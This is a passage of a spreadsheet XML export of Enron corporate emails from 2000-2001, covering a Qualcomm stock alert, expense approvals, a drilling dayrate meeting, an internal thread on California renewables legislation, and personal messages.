harna in front of US energy major Enron's Dabhol Power Company's power proj=_x000D_
ect on June 5, demanding cancellation of the power purchase agreement with =_x000D_
DPC and and end to renegotiation. R Jadhav, zonal monitor (Nasik), Subordin=_x000D_
ate Engineers Association, said people from the Konkan region would also pa=_x000D_
rticipate i</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 11:47:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'midday22@alerts.equityalert.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 =09[IMAGE]=09 =09[IMAGE]=09[IMAGE]=09_x000D_
_x000D_
_x000D_
             [IMAGE] [IMAGE]   [IMAGE] [IMAGE] Upgrades  [IMAGE] DownGrades=_x000D_
  [IMAGE] Coverage Initiated  [IMAGE] Coverage Reiterated  [IMAGE] Stock Sp=_x000D_
lits  [IMAGE] Buybacks  [IMAGE] Dividends  [IMAGE] Pos Pre-Announce  [IMAGE=_x000D_
] Neg Pre-Announce  [IMAGE] Pos Surprises  [IMAGE] Neg Surprises  [IMAGE] E=_x000D_
arnings Revisions  [IMAGE] IPO - Lockup Periods  [IMAGE] IPO - Latest Prici=_x000D_
ng  [IMAGE] IPO - Quite Periods  [IMAGE] IPO - Postponements  [IMAGE] IPO -=_x000D_
 Withdrawals  [IMAGE] IPO - Latest Filings     [IMAGE]   [IMAGE]   [IMAGE] =_x000D_
 [IMAGE]  [IMAGE] Unsubscribe  [IMAGE] Update  my Membership / Profile  [IM=_x000D_
AGE] Forgot  Username / Password  [IMAGE] Add  / Edit Alerts  [IMAGE] View =_x000D_
 My Alerts   [IMAGE] [IMAGE] [IMAGE] [IMAGE]   [IMAGE]  [IMAGE]    [IMAGE] =_x000D_
[IMAGE] [IMAGE] =09  As requested, your News Alert for QCOM  follows from E=_x000D_
quityAlert.com.     Qualcomm Inc. Is Approaching Support     (RealTimeTrade=_x000D_
rs.com) - Qualcomm Inc. (QCOM) moved higher at the open of today's session,=_x000D_
 before leveling off into a range. The stock has dropped steadily lower in =_x000D_
the last 20 minutes on increased volume and is now down 1.27 at $47.03. Qua=_x000D_
lcomm Inc. has been trading in a range for the last 6 weeks at the lows of =_x000D_
the year and may find support around $38.45. Copyright(c) 2001 RealTimeTrad=_x000D_
ers.com, Inc. All Rights Reserved    [IMAGE]    ***IMPORTANT NOTICE AND DIS=_x000D_
CLAIMER REGARDING THIS COURTESY EMAIL***   At your request, as a subscriber=_x000D_
 to our service, this email alert is being sent to you as a courtesy and is=_x000D_
 for information purposes only. We are a financial news re-distributor. We =_x000D_
are not an investment advisory and do not purport to tell or suggest which =_x000D_
companies you should monitor or which securities you should purchase or sel=_x000D_
l.   In addition to the information regarding the company you are monitorin=_x000D_
g (the "Monitored Company"), this email contains advertisements describing =_x000D_
products, services or companies for which we receive fees from the advertis=_x000D_
ing companies. In the case of Cybertrader, distribution of this advertiseme=_x000D_
nt forms a component of a content exchange agreement with RealTimeTraders.c=_x000D_
om, Inc. We reserve the right to sell all or part of these shares at anytim=_x000D_
e, either before, during or after the advertisement period.   In addition, =_x000D_
not withstanding our policy of prohibiting employees from buying or selling=_x000D_
 securities of an advertising company for a period of 20 days following dis=_x000D_
semination of the advertisement, we may not be able to effectively monitor =_x000D_
our employees to ensure compliance with the same. Consequently, there may b=_x000D_
e sales and/or purchases of such securities by our employees prior to, duri=_x000D_
ng and immediately following the dissemination of the advertisement.   Plea=_x000D_
se note that (1) this email may not contain the full text of the press rele=_x000D_
ase issued by, or the research or other reports regarding, the Monitored Co=_x000D_
mpany; and (2) the text of the advertisement, the press release and/or repo=_x000D_
rts were obtained from third party sources and were not written, generated =_x000D_
or edited by us; accordingly, we make no representations or give any assura=_x000D_
nce as to the accuracy or completeness, nor have we conducted any independe=_x000D_
nt investigations of, the disclosures regarding the subject matter of such =_x000D_
releases and reports.   Please note that links to the advertising company a=_x000D_
nd/or Monitored Company are provided for your convenience. We assume no obl=_x000D_
igation for the content of such sites.   All information contained herein s=_x000D_
hould be independently verified by you with the advertising company or with=_x000D_
 Monitored Company or any other sources you prefer.   [THIS IS ONLY A SUMMA=_x000D_
RY OF, AND IS QUALIFIED IN ITS ENTIRETY BY REFERENCE TO, THE "EQUITYALERT S=_x000D_
UBSCRIBER AGREEMENT AND DISCLAIMER." PLEASE VISIT http://www.equityalert.co=_x000D_
m/home/disclaim.asp  FOR ACCESS TO OUR COMPLETE DISCLAIMER]        =09  [IM=_x000D_
AGE] [IMAGE] [IMAGE] [IMAGE]   [IMAGE] [IMAGE] [IMAGE]  [IMAGE] [IMAGE] [IM=_x000D_
AGE] Stock  Quote [IMAGE]   [IMAGE] Stock  Chart [IMAGE]   [IMAGE] Covered =_x000D_
 Calls  [IMAGE]   [IMAGE] Company  Profile [IMAGE]   [IMAGE] [IMAGE]  [IMAG=_x000D_
E] [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE]   [IMAGE] [IMAGE] [IMAGE] Option=_x000D_
  Details  [IMAGE]   [IMAGE] Black  - Scholes [IMAGE]     Sector/Industry C=_x000D_
hanges  Power Option PLUS Logo     [IMAGE] [IMAGE] [IMAGE] [IMAGE] [IMAGE] =_x000D_
[IMAGE]    [IMAGE]  =09_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 03:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ENA Meeting and Event Expenditure Approval Process</t>
  </si>
  <si>
    <t xml:space="preserve">perfect.   thank you._x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kimberly Brown                           07/11/2000 09:47 AM_x000D_
	_x000D_
_x000D_
To: Scott Neal/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: ENA Meeting and Event Expenditure Approval Process  _x000D_
_x000D_
I spoke with Dorie Hitchcock and she said that since the estimated cost is _x000D_
less than $5000, we do not need the form.  She said I can simply forward her _x000D_
a copy of the expense report after the dinner._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 May 2000 10:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.peyton@enron.com'})</t>
  </si>
  <si>
    <t>Re: Friday Meeting on Dayrates</t>
  </si>
  <si>
    <t xml:space="preserve">John,_x000D_
_x000D_
For confirmation, I have this meeting scheduled at 4:30 on June 2, 2000.  _x000D_
Please let me know if you have something different._x000D_
_x000D_
Thanks_x000D_
_x000D_
Kim Hillis_x000D_
x30681_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Peyton@ECT_x000D_
05/30/2000 06:13 PM_x000D_
To: Scott Neal/HOU/ECT@ECT_x000D_
cc: Kimberly Brown/HOU/ECT@ECT, Brian Redmond/HOU/ECT@ECT, John J _x000D_
Lavorato/Corp/Enron@Enron, Julie A Gomez/HOU/ECT@ECT, Keith _x000D_
MacIvor/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Friday Meeting on Dayrates_x000D_
_x000D_
Just as a reminder to everyone, there is a meeting in John Lavorato's office _x000D_
this Friday June 2nd regarding Dayrates_x000D_
_x000D_
John_x000D_
_x000D_
Enclosed is the presentation that Keith MacIvor and I gave to Noble _x000D_
Drilling's CEO, Jim Day and Pride International's CEO, Paul Bragg, their CFO, _x000D_
Earl McNiel, and their COO, James Allen this morning 5/30.  Both sets of _x000D_
leaders were extremely interested in pursuing dayrate transactions with us.  _x000D_
Both sets said that they believed this product would have a very positive _x000D_
impact of the drilling business._x000D_
_x000D_
Jim Day assigned us to his leading financial innovators, Mark May and Steve _x000D_
Manz.  Paul Bragg and Earl McNiel are wanting to sign an ISDA asap and begin _x000D_
discussions asap._x000D_
_x000D_
 I will be giving the same presentation to the CEO of Diamond Offshore, Jim _x000D_
Tisch this Thursday (in New York) and a "deal specific" presentation to the _x000D_
CFO of Chiles Offshore the same day._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Aug 2001 09:10:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: SBX2 78 - Update</t>
  </si>
  <si>
    <t xml:space="preserve">Great.  Look forward to the call._x000D_
_x000D_
-----Original Message-----_x000D_
From: Mainzer, Elliot=20_x000D_
Sent: Wednesday, August 29, 2001 5:14 PM_x000D_
To: Steffes, James D.; Bolton, Stacey; Thome, Jennifer; Dasovich, Jeff_x000D_
Cc: Bryson, Jesse; Schoen, Mary_x000D_
Subject: RE: SBX2 78 - Update_x000D_
_x000D_
_x000D_
We are in the process of calculating EWS's potential short position on gree=_x000D_
n power that could result from an RPS in California. We should have definit=_x000D_
ive numbers by mid-day tomorrow. We are working with Steve Swain and Jeff R=_x000D_
ichter to assess the exposure, running our commodity short against $1.50, $=_x000D_
3.00 and $7.00 green curves. Numbers will eventually be adjusted for contra=_x000D_
cts with pass-through clauses. We can discuss the results on our conference=_x000D_
 call tomorrow._x000D_
EM_x000D_
_x000D_
-----Original Message-----_x000D_
From: Steffes, James D.=20_x000D_
Sent: Wednesday, August 29, 2001 2:44 PM_x000D_
To: Mainzer, Elliot; Bolton, Stacey; Thome, Jennifer; Dasovich, Jeff_x000D_
Cc: Bryson, Jesse; Schoen, Mary_x000D_
Subject: RE: SBX2 78 - Update_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From:=09Mainzer, Elliot_x000D_
Sent:=09Wed 8/29/2001 4:02 PM_x000D_
To:=09Bolton, Stacey; Thome, Jennifer; Dasovich, Jeff_x000D_
Cc:=09Bryson, Jesse; Steffes, James D.; Schoen, Mary_x000D_
Subject:=09RE: SBX2 78 - Update_x000D_
_x000D_
I want to make sure that Jeff Richter from the power desk knows about this =_x000D_
potential increased cost._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From:=09Mainzer, Elliot_x000D_
Sent:=09Wed 8/29/2001 4:02 PM_x000D_
To:=09Bolton, Stacey; Thome, Jennifer; Dasovich, Jeff_x000D_
Cc:=09Bryson, Jesse; Steffes, James D.; Schoen, Mary_x000D_
Subject:=09RE: SBX2 78 - Update_x000D_
_x000D_
How about tomorrow afternoon at 4:00 Houston time?_x000D_
_x000D_
=09 -----Original Message-----_x000D_
=09From: =09Bolton, Stacey =20_x000D_
=09Sent:=09Wednesday, August 29, 2001 1:55 PM_x000D_
=09To:=09Mainzer, Elliot; Thome, Jennifer; Dasovich, Jeff_x000D_
=09Cc:=09Bryson, Jesse; Steffes, James D.; Schoen, Mary_x000D_
=09Subject:=09RE: SBX2 78 - Update_x000D_
_x000D_
=09I think that's a good idea -- particularly w/ respect to the likelihood =_x000D_
of passage.  If we could arrange for tomorrow afternoon after 2:00 p.m. CDT=_x000D_
 that would be great.  I've got a 4:00 and a 5:00 this afternoon._x000D_
_x000D_
=09Thanks,_x000D_
=09Stacey Bolton_x000D_
=09Environmental Strategies_x000D_
=09Enron Corp_x000D_
=09713-853-9916 direct=20_x000D_
=09713-303-2632 cell=20_x000D_
=09sbolton@enron.com &lt;mailto:sbolton@enron.com&gt;_x000D_
=09=20_x000D_
_x000D_
=09=09 -----Original Message-----_x000D_
=09=09From: =09Mainzer, Elliot =20_x000D_
=09=09Sent:=09Wednesday, August 29, 2001 3:23 PM_x000D_
=09=09To:=09Thome, Jennifer; Dasovich, Jeff_x000D_
=09=09Cc:=09Bryson, Jesse; Steffes, James D.; Bolton, Stacey; Schoen, Mary_x000D_
=09=09Subject:=09RE: SBX2 78 - Update_x000D_
_x000D_
=09=09Jenny -- I would appreciate you setting up a call with relevant folks=_x000D_
 to discuss this. Later this afternoon or tomorrow afternoon work well for =_x000D_
me._x000D_
_x000D_
=09=09Thx,_x000D_
_x000D_
=09=09Elliot_x000D_
_x000D_
_x000D_
=09=09=09 -----Original Message-----_x000D_
=09=09=09From: =09Thome, Jennifer =20_x000D_
=09=09=09Sent:=09Wednesday, August 29, 2001 1:10 PM_x000D_
=09=09=09To:=09Dasovich, Jeff_x000D_
=09=09=09Cc:=09Bryson, Jesse; Mainzer, Elliot; Steffes, James D.; Bolton, S=_x000D_
tacey; Schoen, Mary_x000D_
=09=09=09Subject:=09FW: SBX2 78 - Update_x000D_
_x000D_
=09=09=09Jeff:_x000D_
_x000D_
=09=09=09As you may know, at Jim's request, Stacey Bolton reviewed the rene=_x000D_
wables language in SBX2 79 and SB 532 and identified some important issues.=_x000D_
=20_x000D_
_x000D_
=09=09=09In a memo she sent out yesterday, she detailed her concerns about =_x000D_
these bills (copied below, for your reference). =20_x000D_
_x000D_
=09=09=09How do you suggest we proceed?  Shall I arrange a brief call for u=_x000D_
s with Stacey, Elliot, Mary and Jesse to discuss where we stand and strateg=_x000D_
y going forward?_x000D_
_x000D_
=09=09=09Jennifer =20_x000D_
_x000D_
=09=09=09***************_x000D_
=09=09=09Overall Concerns: =20_x000D_
=09=09=09=091.=09The requirement for retailers to enter into a direct bilat=_x000D_
eral for the power from renewable energy and schedule it into the CA grid p=_x000D_
resents limitations and could drive up costs._x000D_
=09=09=09=092.=09It's unclear if the REC is truly separate instrument from =_x000D_
the underlying commodity.  The above requirement indicates that it is not. =_x000D_
 This would negatively impact, and even negate the main reasons to have a R=_x000D_
EC trading program - to provide flexibility and act as verification for the=_x000D_
 RPS._x000D_
=09=09=09=093.=09The biomass definition is too limiting.  Would be difficul=_x000D_
t to detail this amount of information on a REC.  Need to have language tha=_x000D_
t distinguishes whether the REC is RPS eligible or not._x000D_
=09=09=09=094.=09Utilities are given preferential treatment in proposed lan=_x000D_
guage in that utilities can recover costs through rate base and the Departm=_x000D_
ent of Water Resources (SB 532 only) is instructed to purchase renewables o=_x000D_
n their behalf if it is cost prohibitive for the utilities._x000D_
=09=09=09=095.=09While the cost cap is positive from a retail perspective, =_x000D_
it might be out of the market from a wholesale perspective to cover the ren=_x000D_
ewable premiums for new sources._x000D_
_x000D_
_x000D_
=09=09=09 -----Original Message-----_x000D_
=09=09=09From: =09Bolton, Stacey =20_x000D_
=09=09=09Sent:=09Wednesday, August 29, 2001 2:39 PM_x000D_
=09=09=09To:=09Thome, Jennifer_x000D_
=09=09=09Cc:=09Mainzer, Elliot; Bryson, Jesse_x000D_
=09=09=09Subject:=09RE: SBX2 78 - Update_x000D_
_x000D_
=09=09=09The concerns that I listed at the end of the memo are the ones tha=_x000D_
t I believe need to be addressed and clarified if it appears one of these b=_x000D_
ills are moving forward at a rapid pace.  Thanks!_x000D_
_x000D_
=09=09=09Stacey Bolton_x000D_
=09=09=09Environmental Strategies_x000D_
=09=09=09Enron Corp_x000D_
=09=09=09713-853-9916 direct=20_x000D_
=09=09=09713-303-2632 cell=20_x000D_
=09=09=09sbolton@enron.com &lt;mailto:sbolton@enron.com&gt;_x000D_
=09=09=09=20_x000D_
_x000D_
=09=09=09=09 -----Original Message-----_x000D_
=09=09=09=09From: =09Thome, Jennifer =20_x000D_
=09=09=09=09Sent:=09Wednesday, August 29, 2001 2:22 PM_x000D_
=09=09=09=09To:=09Bolton, Stacey_x000D_
=09=09=09=09Cc:=09Mainzer, Elliot; Bryson, Jesse_x000D_
=09=09=09=09Subject:=09RE: SBX2 78 - Update_x000D_
_x000D_
=09=09=09=09Stacey:_x000D_
_x000D_
=09=09=09=09As Jim has asked me to follow more closely CA legislation, I su=_x000D_
ggest you let both Jeff and me know what your issues are, etc. and we can d=_x000D_
etermine the best way to proceed._x000D_
_x000D_
=09=09=09=09Thanks,=20_x000D_
_x000D_
=09=09=09=09Jennifer_x000D_
_x000D_
_x000D_
=09=09=09=09=09 -----Original Message-----_x000D_
=09=09=09=09=09From: =09Bolton, Stacey =20_x000D_
=09=09=09=09=09Sent:=09Wednesday, August 29, 2001 2:04 PM_x000D_
=09=09=09=09=09To:=09Thome, Jennifer_x000D_
=09=09=09=09=09Cc:=09Mainzer, Elliot; Bryson, Jesse_x000D_
=09=09=09=09=09Subject:=09RE: SBX2 78 - Update_x000D_
_x000D_
=09=09=09=09=09Thanks.  The changes in combination are okay, though it woul=_x000D_
d be better to get the date as Sept '96 for eligibility and interconnected =_x000D_
to CA grid.  Also, we still need to work on the REC language (i.e. not mand=_x000D_
atorily tied to output power contracts).  What's the best way to approach? =_x000D_
 Discuss w/ Jeff Dasovich?_x000D_
_x000D_
=09=09=09=09=09Stacey Bolton_x000D_
=09=09=09=09=09Environmental Strategies_x000D_
=09=09=09=09=09Enron Corp_x000D_
=09=09=09=09=09713-853-9916 direct=20_x000D_
=09=09=09=09=09713-303-2632 cell=20_x000D_
=09=09=09=09=09sbolton@enron.com &lt;mailto:sbolton@enron.com&gt;_x000D_
=09=09=09=09=09=20_x000D_
_x000D_
=09=09=09=09=09 -----Original Message-----_x000D_
=09=09=09=09=09From: =09Thome, Jennifer =20_x000D_
=09=09=09=09=09Sent:=09Wednesday, August 29, 2001 11:40 AM_x000D_
=09=09=09=09=09To:=09Bolton, Stacey_x000D_
=09=09=09=09=09Subject:=09FW: SBX2 78 - Update_x000D_
_x000D_
_x000D_
=09=09=09=09=09FYI - see Scott's message below for an update on SBX2 78. =_x000D_
=20_x000D_
_x000D_
=09=09=09=09=09Also, I wanted to make sure that you have on your radar scre=_x000D_
en the most recent versions of the bills you analyzed.   I noticed, for exa=_x000D_
mple, that in the most recent version of SB 532 (amended on 8/27) there wer=_x000D_
e some important revisions (for example, see highlighted text).   This bill=_x000D_
 is avaiable at: http://info.sen.ca.gov/pub/bill/sen/sb_0501-0550/sb_532_bi=_x000D_
ll_20010827_amended_asm.html_x000D_
_x000D_
=09=09=09=09=09Jennifer_x000D_
_x000D_
=09=09=09=09=09CHAPTER 5.6. CALIFORNIA RENEWABLES PORTFOLIO STANDARD PROGRA=_x000D_
M 25465. For purposes of this chapter, the following terms have the followi=_x000D_
ng meanings. (a) "Eligible renewable energy resource" means an electric gen=_x000D_
erating facility or solar thermal energy system that reduces the consumptio=_x000D_
n of electricity through the use of renewable resources and generating faci=_x000D_
lity that meets all of the following criteria: (1) Uses wind, solar, geothe=_x000D_
rmal, or biomass as its primary fuel. (A) A solar thermal energy system tha=_x000D_
t reduces the consumption of electricity may be considered an eligible rene=_x000D_
wable energy resource. (B) Fuel cells using renewable fuels are an eligible=_x000D_
 renewable energy resource. (2) Improves the resource diversity in the elec=_x000D_
tricity market that serves the state, and increases the reliability of the =_x000D_
state's electricity system. The commission shall deem an electric generatin=_x000D_
g facility or solar thermal energy system to satisfy this requirement if it=_x000D_
 meets any one of the following criteria: (A) It is located within or inter=_x000D_
connected to the control area of the California Independent System Operator=_x000D_
, the Los Angeles Department of Water and Power, or the Imperial Irrigation=_x000D_
 District. (B) Its power is sold under a direct bilateral contract to a ret=_x000D_
ail seller and its energy is scheduled into the control area of the Califor=_x000D_
nia Independent System Operator, the Los Angeles Department of Water and Po=_x000D_
wer, or the Imperial Irrigation District. (C) It meets other fact-based cri=_x000D_
teria established by the commission. seller and its energy is delivered to =_x000D_
end-use customers within the state. (b) "Eligible existing renewable energy=_x000D_
 resource" means an electric generating facility that satisfies all criteri=_x000D_
a in subdivision (a) and is in existence before January 1, 2001 September 2=_x000D_
6, 1996 . Any facility that sells its output to an electrical corporation u=_x000D_
nder a contract entered into prior to 1996 under the federal Public Utiliti=_x000D_
es Regulatory Policies Act of 1978 (P.L. 95-617) shall be considered an eli=_x000D_
gible existing resource. (c) "Eligible new renewable energy resource" means=_x000D_
 output from an electric generating facility that satisfies all criteria in=_x000D_
 subdivision (a) and meets at least one of the following criteria: (1) The =_x000D_
facility commenced initial operation on or after January 1, 2001. September=_x000D_
 26, 1996. (2) The output represents incremental production from repowered =_x000D_
or refurbished existing facilities and project additions completed on or af=_x000D_
ter January 1, 2001 September 26, 1996 , as measured by the production of k=_x000D_
ilowatthours above the five-year average of the kilowatthours delivered fro=_x000D_
m the project during the five-year period ending December 31, 2000. kilowat=_x000D_
thours previously delivered from the project. Incremental output from repow=_x000D_
ered or refurbished facilities sold to an electrical corporation under a co=_x000D_
ntract entered into prior to January 1, 2001, that specifies fixed capacity=_x000D_
 payments for the incremental output may not be considered an eligible new =_x000D_
renewable energy resource. (3) The output represents incremental output abo=_x000D_
ve levels specified in contracts for facilities defined in subdivision (b)._x000D_
_x000D_
=09=09=09=09=09Also: (c) "Eligible new renewable energy resource" means out=_x000D_
put from an electric generating facility that satisfies all criteria in sub=_x000D_
division (a) and meets at least one of the following criteria: (1) The faci=_x000D_
lity commenced initial operation on or after January 1, 2001. September 26,=_x000D_
 1996. (2) The output represents incremental production from repowered or r=_x000D_
efurbished existing facilities and project additions completed on or after =_x000D_
January 1, 2001 September 26, 1996=20_x000D_
_x000D_
_x000D_
=09=09=09=09=09 -----Original Message-----_x000D_
=09=09=09=09=09From: =09"Scott Govenar" &lt;sgovenar@govadv.com&gt;@ENRON [mailto=_x000D_
:IMCEANOTES-+22Scott+20Govenar+22+20+3Csgovenar+40govadv+2Ecom+3E+40ENRON@E=_x000D_
NRON.com]=20_x000D_
=09=09=09=09=09Sent:=09Tuesday, August 28, 2001 8:43 PM_x000D_
=09=09=09=09=09To:=09Sharma, Ban; Leboe, David; Eric Letke; Thome, Jennifer=_x000D_
; Ken Smith; Bev Hansen; Hedy Govenar; Buster, Miyung; Guerrero, Janel; Rob=_x000D_
ert Frank; Mike Day; Lawner, Leslie; Kingerski, Harry; Karen Denne; Kean, S=_x000D_
teven J.; Alan Comnes; Susan J Mara; Kaufman, Paul; Jeff Dasovich; Steffes,=_x000D_
 James D.; Rick Shapiro_x000D_
=09=09=09=09=09Subject:=09SBX2 78 - Update_x000D_
_x000D_
=09=09=09=09=09The Assembly Energy, Costs and Availability Committee heard =_x000D_
and voted on_x000D_
=09=09=09=09=09amendments to SBX2 78 proposed by many interested parties.  =_x000D_
Some passed,_x000D_
=09=09=09=09=09some failed and most of them served to further confuse the c=_x000D_
ommittee_x000D_
=09=09=09=09=09members.  Eventually the committee stalled on detailed propo=_x000D_
sals made by_x000D_
=09=09=09=09=09TURN and other consumer groups._x000D_
_x000D_
=09=09=09=09=09During the hearing Hedy had the opportunity to speak to Nanc=_x000D_
y McFadden and_x000D_
=09=09=09=09=09Richard Katz from the Governor's office regarding a couple o=_x000D_
f issues_x000D_
=09=09=09=09=09highlighted by Jeff and Mike Day.  Richard said he is willin=_x000D_
g to make more_x000D_
=09=09=09=09=09technical amendments when the bill gets to Appropriations.  =_x000D_
Subsequently,_x000D_
=09=09=09=09=09Hedy and I spoke to D.J. Smith at Jeff's request.  D.J. agre=_x000D_
ed that the bill_x000D_
=09=09=09=09=09needs to use the August 24th date as a grandfather date for =_x000D_
executed DA_x000D_
=09=09=09=09=09contracts, but specifically asked that we (Enron) not speak =_x000D_
to Richard about_x000D_
=09=09=09=09=09it.  He said he will have the business entities request it a=_x000D_
s a clarifying_x000D_
=09=09=09=09=09amendment.  If we request it, he thought Richard would be le=_x000D_
ss likely to_x000D_
=09=09=09=09=09believe it's clarifying since he believes our motives to be =_x000D_
too_x000D_
=09=09=09=09=09self-serving.  Also, we spent some time with Lenny Goldberg =_x000D_
on direct_x000D_
=09=09=09=09=09access.  We suggested that "shall" be changed to "may" in or=_x000D_
der to give more_x000D_
=09=09=09=09=09leeway to the PUC on direct access suspension.  He didn't ne=_x000D_
cessarily oppose_x000D_
=09=09=09=09=09the policy, but his position is not to amend a bad bill unle=_x000D_
ss you can_x000D_
=09=09=09=09=09totally rewrite it (which he later attempted to do)._x000D_
_x000D_
=09=09=09=09=09A lobbyist for a significant generator told us that they are=_x000D_
 prepared to_x000D_
=09=09=09=09=09push Edison into bankruptcy (along with the Canadian governm=_x000D_
ent) if this_x000D_
=09=09=09=09=09bill passes._x000D_
_x000D_
=09=09=09=09=09There is no consensus that this measure will ever get to the=_x000D_
 Governor's_x000D_
=09=09=09=09=09desk._x000D_
_x000D_
=09=09=09=09=09The committee will meet again tomorrow at approximately 1:30=_x000D_
 p.m. to vote on_x000D_
=09=09=09=09=09additional amendments and ultimately to vote on the complete=_x000D_
 bill._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Feb 2000 01:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tom.swank@enron.com', 'mike.coleman@enron.com'})</t>
  </si>
  <si>
    <t>Here is a summary of the USEC transaction._x000D_
_x000D_
_x000D_
Thanks_x000D_
Ben_x000D_
3-7998</t>
  </si>
  <si>
    <t>Fri, 22 Sep 2000 03:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>HPL Nom for September 23, 2000</t>
  </si>
  <si>
    <t>(See attached file: hpl0923.xls)_x000D_
_x000D_
 - hpl0923.xls</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 12:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ClickAtHome is Coming Soon!</t>
  </si>
  <si>
    <t>Want a NEW high speed computer?_x000D_
_x000D_
866 MHz Pentium III Processor FAST enough?_x000D_
_x000D_
Want High Speed internet?_x000D_
Broadband,_x000D_
Cable Modem,_x000D_
DSL,_x000D_
Satellite._x000D_
_x000D_
Then Get READY..._x000D_
All Eligible U.S. Employees get innovative at HOME beginning March, 2001._x000D_
_x000D_
Go to http://clickathome.enron.com to LEARN more about the offerings._x000D_
_x000D_
Non-U.S. Eligible Employees get innovative at home beginning late 2001 and _x000D_
2002.</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 08:26:33 -0800 (PST)</t>
  </si>
  <si>
    <t>i think going to ny is in your best interest_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 26, 2001 10:15 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
see you cannot be trusted.  and how is that looking out for your best interests?  should you change your thinking sir?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 26, 2001 10:13 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
youre right, im sorry, i think i was looking out for me_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 26, 2001 10:10 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
why would you want to do that?  how is that looking out for me?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 26, 2001 10:10 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
i think so_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 26, 2001 10:09 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
are you trying to get me in trouble charlie brown?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 26, 2001 10:08 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
really?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 26, 2001 10:07 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
you find me the explanation to all and i will find the day!_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 26, 2001 10:06 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
i am serious, you can find one day_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 26, 2001 9:59 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
are you being serious?  i am not my own boss you forget._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 26, 2001 9:58 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
you tell me, my schedule is pretty open_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 26, 2001 9:57 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
ok when?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Monday, November 26, 2001 9:54 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
cant we just go for one day_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Monday, November 26, 2001 9:51 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
they are lighting the tree on wednesday in ny!  we are going to miss it.</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 03:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'laura.podurgiel@enron.com', 'ozzie.pagan@enron.com', 'rogers.herndon@enron.com', 'corry.bentley@enron.com', 'stacey.white@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'jim.homco@enron.com', 'lloyd.will@enron.com', 'kayne.coulter@enron.com', 'edward.sacks@enron.com', 'brad.morse@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'tom.may@enron.com', 'edith.cross@enron.com', 'madhup.kumar@enron.com', 'kay.mann@enron.com', 'christi.nicolay@enron.com', 'erik.serio@enron.com', 'leslie.reeves@enron.com'})</t>
  </si>
  <si>
    <t>Marketing Strategy</t>
  </si>
  <si>
    <t xml:space="preserve">Please review and comment by Monday._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Reagan_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 00:06:00 -0800 (PST)</t>
  </si>
  <si>
